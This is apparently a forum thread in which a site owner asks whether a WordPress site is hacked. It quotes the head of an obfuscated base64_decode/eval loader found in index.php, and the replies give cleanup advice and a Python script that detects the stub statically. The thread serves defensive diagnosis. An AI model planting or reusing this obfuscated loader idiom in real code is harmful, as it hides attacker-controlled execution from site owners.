doctorbill

Website hacked?

I have been asked to investigate the following website.
If I type "aurumsearch" into the Google search box, I get the following page: The link works perfectly well and goes to the correct page.
If I inspect the page, the element that brings this link up is:
<h3 class="LC20lb DKV0Md">呼出ハーン Cole Haan レディース 袋 ショルダーバッグ ...</h3>

If I go to the site host and look at the index.php page code in File Manager (Plesk control panel) of the WordPress site, the following shows up (only part of the page text shown):

Index.php
<?php $O00OO0=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdq");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("

Any ideas what is going on here - is it a hack?
HTML, PHP, WordPress


8/22/2022 - Mon
Dave Baldwin

Yes it is. Is this site on GoDaddy?
doctorbill

ASKER
No - Ionos
Kimputer

Since you restored your page already, please know, if you didn't change anything at all except restore, it WILL happen again. Please try to find out the attack vector and plug the hole.
Check if WP itself was up to date, then check any plugin or theme (yes, they need to be up to date as well).
Change your MySQL password, as well as the website FTP logins.
If you still really can't find it, ask your web host to help.
Robert Granlund

You can also ask your host to scan your site for malware. Consider installing the Wordfence plugin, since it is a WordPress site, and scan the site and, as already mentioned, change all of the passwords. Good luck.
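For the scanning advice above, an added example (not code from any poster in this thread): a Python check that statically resolves the string-building stub quoted in the question, without executing any PHP, and flags files that follow the same loader idiom. The function names `resolve_stub` and `looks_like_loader` are hypothetical; the sample is the visible head of the quoted index.php.

```python
import base64
import re

# Visible head of the index.php quoted in the question, up to eval(). The payload
# argument is not on the page, so it is left out; nothing here executes PHP.
SAMPLE = (
    '<?php $O00OO0=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdq");'
    '$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};'
    '$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};'
    '$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};'
    '$OO0000=$O00OO0{7}.$O00OO0{13};'
    '$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}'
    '.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("'
)

ASSIGN = re.compile(r'(\$[O0]+)(\.?=)([^;]+);')          # $name = expr;  or  $name .= expr;
SEED = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')  # literal alphabet string
TERM = re.compile(r'(\$[O0]+)\{(\d+)\}')                  # $name{index} character pick

def resolve_stub(php_source):
    """Resolve the $O0..{n} concatenations by text analysis only."""
    values = {}
    for name, op, expr in ASSIGN.findall(php_source):
        seed = SEED.fullmatch(expr)
        if seed:
            text = base64.b64decode(seed.group(1)).decode("latin-1")
        else:
            terms = TERM.findall(expr)
            # Skip expressions that use unresolved variables or out-of-range indexes.
            if not terms or any(v not in values or int(i) >= len(values[v]) for v, i in terms):
                continue
            text = "".join(values[v][int(i)] for v, i in terms)
        values[name] = values.get(name, "") + text if op == ".=" else text
    return values

def looks_like_loader(php_source):
    """True when a variable resolves to base64_decode and is called inside eval()."""
    resolved = resolve_stub(php_source)
    called = re.search(r'\beval\s*\(\s*\$[O0]+\s*\(', php_source) is not None
    return "base64_decode" in resolved.values() and called

if __name__ == "__main__":
    for var, val in resolve_stub(SAMPLE).items():
        print(var, "=>", repr(val))
    print("loader idiom:", looks_like_loader(SAMPLE))
```

Running `looks_like_loader` over every `.php` file under the web root, including theme and plugin directories, shows whether the restore left other copies of the same stub in place.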
ASKER CERTIFIED SOLUTION
David Favor

THIS SOLUTION ONLY AVAILABLE TO MEMBERS.
doctorbill

ASKER
Thanks all
David Favor

You're welcome!

Hang in there!

After you cleaned up... 100s of hacked sites... this will all become 2nd nature to you...